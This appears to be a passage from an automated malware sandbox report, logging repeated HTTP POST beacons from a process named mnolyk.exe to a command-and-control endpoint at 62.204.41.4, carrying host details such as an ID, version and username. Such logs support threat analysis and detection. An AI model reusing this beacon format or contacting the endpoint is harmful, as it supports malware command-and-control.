                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:01.187212944 CET514INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            326192.168.2.45002162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:01.371725082 CET515OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:01.439729929 CET515INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            327192.168.2.45002262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:01.616779089 CET516OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:01.680536985 CET516INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            328192.168.2.45002362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:01.855210066 CET517OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:01.922120094 CET517INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            329192.168.2.45002462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:02.100310087 CET518OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:02.164222002 CET518INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:02 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            33192.168.2.44972862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:34.522764921 CET222OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:34.586766005 CET222INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:34 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            330192.168.2.45002562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:02.337619066 CET519OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:02.402637005 CET519INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:02 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            331192.168.2.45002662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:02.587069988 CET520OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:02.651599884 CET520INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:02 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            332192.168.2.45002762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:02.823441982 CET521OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:02.889178991 CET521INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:02 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            333192.168.2.45002862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:03.062794924 CET522OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:03.128715992 CET522INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:03 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            334192.168.2.45002962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:03.307262897 CET523OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:03.371998072 CET523INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:03 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            335192.168.2.45003062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:03.558067083 CET524OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:03.626437902 CET524INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:03 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            336192.168.2.45003162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:03.810410023 CET525OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:03.875169992 CET525INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:03 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            337192.168.2.45003262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:04.057615995 CET526OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:04.124161005 CET526INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:04 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            338192.168.2.45003362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:04.293934107 CET527OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:04.360657930 CET527INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:04 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            339192.168.2.45003462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:04.545459032 CET528OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:04.609428883 CET528INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:04 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            34192.168.2.44972962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:35.078277111 CET223OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:35.144102097 CET223INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:35 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            340192.168.2.45003562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:04.790431976 CET529OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:04.855072975 CET529INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:04 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            341192.168.2.45003662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:05.033129930 CET530OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:05.098758936 CET530INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:05 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            342192.168.2.45003762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:05.274550915 CET530OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:05.338116884 CET531INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:05 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            343192.168.2.45003862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:05.523813009 CET532OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:05.587480068 CET532INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:05 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            344192.168.2.45003962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:05.758232117 CET533OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
